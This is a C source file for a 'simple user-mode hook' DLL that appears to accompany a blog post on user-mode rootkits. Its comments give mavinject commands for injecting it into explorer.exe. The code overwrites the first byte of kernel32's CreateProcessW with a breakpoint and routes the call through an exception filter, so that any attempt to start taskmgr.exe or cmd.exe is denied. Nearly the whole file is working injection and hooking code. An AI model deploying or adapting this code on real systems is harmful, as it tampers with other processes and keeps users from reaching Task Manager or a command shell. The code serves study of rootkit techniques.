Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
#include <wctype.h>
// Address of kernel32!CreateProcessW, resolved by HookFunction; NULL until then.
FARPROC fpCreateProcessW;
// Original first byte of CreateProcessW, saved by HookFunction before it is
// overwritten with INT3 (0xCC) so the hook can be removed again
// (MyCreateProcessW writes it back around the real call).
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explorer.exe                          (find the target's PID; "explore.exe" was a typo)
// mavinject <PID> /INJECTRUNNING C:\Tools\Injectable.dll   (e.g. mavinject 666 ... with the PID found above)
//
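// Patch `size` bytes of (normally read-only) executable memory at fpFunc with
// the bytes at b, temporarily making the page PAGE_EXECUTE_READWRITE.
//
// fpFunc: address inside the current process to overwrite (here: the first
//         byte of CreateProcessW).
// b:      source bytes.
// size:   number of bytes to copy.
// Returns FALSE if the arguments are unusable or either VirtualProtect call
// fails. If the *second* VirtualProtect fails the bytes have already been
// written and the page is left RWX; callers treat that as fatal.
BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
    if (fpFunc == NULL || b == NULL || size == 0)
        return FALSE;
    DWORD dwOldProt = 0;
    if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE)
        return FALSE;
    MoveMemory(fpFunc, b, size);
    // Self-modifying code: MSDN asks callers to flush after modifying code in
    // memory so the CPU does not keep executing stale instruction bytes. Cheap
    // on x86/x64, required on architectures with incoherent I-caches (ARM).
    FlushInstructionCache(GetCurrentProcess(), fpFunc, size);
    return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
}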
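// Install (or re-install) the hook: overwrite the first byte of
// kernel32!CreateProcessW with INT3 (0xCC). Executing it raises
// EXCEPTION_BREAKPOINT, which MyUnhandledExceptionFilter redirects to
// MyCreateProcessW. The original byte is kept in bSavedByte so the hook can
// be removed again.
//
// Called once from DllMain and again from MyCreateProcessW after every real
// CreateProcessW call. No parameters, no return value. On a write failure the
// calling thread is terminated with ExitThread(0) - the original behaviour,
// kept unchanged; note that on the DllMain path this kills the thread that is
// holding the loader lock, which is not a clean failure mode.
VOID HookFunction(VOID) {
    // kernel32 is always mapped in a Win32 process, so there is no need to
    // LoadLibrary it (the old `LoadLibrary(L"kernel32")` also only compiles
    // with UNICODE defined, because plain LoadLibrary is LoadLibraryA).
    fpCreateProcessW = GetProcAddress(GetModuleHandleW(L"kernel32"), "CreateProcessW");
    if (fpCreateProcessW == NULL) {
        return;
    }
    // Save the original first byte exactly once. Re-reading it on every call
    // (the old behaviour) is wrong whenever the hook is already in place -
    // e.g. two threads re-hooking concurrently - because bSavedByte would then
    // become 0xCC and the real prologue byte would be lost for good.
    static BOOL bOriginalSaved = FALSE;
    if (!bOriginalSaved) {
        bSavedByte = *(LPBYTE)fpCreateProcessW;
        bOriginalSaved = TRUE;
    }
    const BYTE bInt3 = 0xCC;
    if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
        ExitThread(0);
    }
}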
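// Case-insensitive substring test for wide strings. Windows file and image
// names are case-insensitive, so "CMD.EXE" must match the "cmd.exe" filter.
// A NULL haystack or needle never matches; an empty needle always matches
// (same as wcsstr).
static BOOL ContainsNoCase(LPCWSTR haystack, LPCWSTR needle) {
    if (haystack == NULL || needle == NULL)
        return FALSE;
    if (*needle == L'\0')
        return TRUE;
    for (; *haystack != L'\0'; ++haystack) {
        LPCWSTR h = haystack;
        LPCWSTR n = needle;
        while (*n != L'\0' && *h != L'\0' && towlower(*h) == towlower(*n)) {
            ++h;
            ++n;
        }
        if (*n == L'\0')
            return TRUE;
    }
    return FALSE;
}

// Replacement for CreateProcessW, entered via the INT3 hook: the exception
// filter sets the instruction pointer to this function while the stack still
// holds the caller's return address and arguments, so returning from here
// returns to the original caller. Same signature and return value as
// CreateProcessW (LPSTARTUPINFO resolves to the W variant only when the
// project is built with UNICODE, as the original assumes).
//
// Policy: refuse to start anything whose image path or command line mentions
// taskmgr.exe or cmd.exe, failing the call with ERROR_ACCESS_DENIED;
// everything else is forwarded to the real CreateProcessW.
//
// NOTE(review): the hook is removed for the duration of the real call and put
// back afterwards, so another thread calling CreateProcessW in that window
// runs unhooked. The filter is also only a string match - an 8.3 short name,
// a renamed copy of the binary, etc. are not stopped. Demo, not a boundary.
BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {
    // Either name argument may legitimately be NULL (CreateProcessW accepts a
    // NULL lpCommandLine when lpApplicationName is given and vice versa). The
    // old code passed lpCommandLine to wcsstr unconditionally, so
    // CreateProcessW(L"...\\cmd.exe", NULL, ...) crashed the host instead of
    // being blocked. Checking lpApplicationName too closes that bypass.
    LPCWSTR blocked[] = { L"taskmgr.exe", L"cmd.exe" };
    for (size_t i = 0; i < sizeof(blocked) / sizeof(blocked[0]); ++i) {
        if (ContainsNoCase(lpApplicationName, blocked[i]) ||
            ContainsNoCase(lpCommandLine, blocked[i])) {
            SetLastError(ERROR_ACCESS_DENIED);
            return FALSE;
        }
    }
    // Temporarily put the original first byte back so the real function runs.
    if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
        ExitThread(0);
    }
    BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
    // Re-hooking calls GetProcAddress/VirtualProtect, which may overwrite the
    // thread's last-error; preserve the real call's value for the caller.
    DWORD dwErr = GetLastError();
    HookFunction();
    SetLastError(dwErr);
    return b;
}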
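// Top-level exception filter that turns the INT3 planted on CreateProcessW
// into a call to MyCreateProcessW.
//
// lpException: EXCEPTION_POINTERS for the unhandled exception.
// Returns EXCEPTION_CONTINUE_EXECUTION after moving the instruction pointer
// to MyCreateProcessW when the exception is our breakpoint, otherwise
// EXCEPTION_CONTINUE_SEARCH so the process's normal handling of genuine
// faults is preserved. The old version returned CONTINUE_EXECUTION for every
// exception, which re-executed any faulting instruction forever.
//
// The comparison is against the function start rather than start+1: like the
// original code, this relies on the kernel reporting a software breakpoint
// with the instruction pointer rewound to the INT3 itself.
//
// NOTE(review): this only fires for exceptions nobody else handled. A process
// with its own SEH/VEH handling for breakpoints, or one under a debugger
// (which swallows INT3), never reaches this filter and the hook is inert.
LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
    if (lpException == NULL || lpException->ExceptionRecord == NULL ||
        lpException->ContextRecord == NULL)
        return EXCEPTION_CONTINUE_SEARCH;
    if (lpException->ExceptionRecord->ExceptionCode != EXCEPTION_BREAKPOINT)
        return EXCEPTION_CONTINUE_SEARCH;
#if defined(_M_X64) || defined(_M_AMD64)
    DWORD64 *pPc = &lpException->ContextRecord->Rip;
#elif defined(_M_IX86)
    DWORD *pPc = &lpException->ContextRecord->Eip;
#else
#error "MyUnhandledExceptionFilter: unsupported architecture"
#endif
    if (*pPc != (DWORD_PTR)fpCreateProcessW)
        return EXCEPTION_CONTINUE_SEARCH;
    *pPc = (DWORD_PTR)MyCreateProcessW;
    return EXCEPTION_CONTINUE_EXECUTION;
}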
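// DLL entry point. On attach: install the top-level exception filter, show the
// "Injected" message box (the demo's visible sign of life) and plant the hook.
// On detach via FreeLibrary (lpReserved == NULL): put the original byte back
// and restore the previous filter, so the host is not left with an INT3 whose
// handler now points at unmapped code. Always returns TRUE.
//
// NOTE(review): DllMain runs under the loader lock; MessageBoxA from here is
// officially unsupported and can deadlock. Kept because the demo relies on it.
BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
    // Filter that was installed before us, remembered so DETACH can restore it.
    static LPTOP_LEVEL_EXCEPTION_FILTER s_prevFilter = NULL;
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        s_prevFilter = SetUnhandledExceptionFilter(MyUnhandledExceptionFilter);
        ::MessageBoxA(NULL, "Boom!", "Injected", 0);
        HookFunction();
        break;
    case DLL_PROCESS_DETACH:
        // lpReserved != NULL means the process is terminating: nothing to undo.
        if (lpReserved == NULL) {
            if (fpCreateProcessW != NULL) {
                WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE));
            }
            SetUnhandledExceptionFilter(s_prevFilter);
        }
        break;
    }
    return TRUE;
}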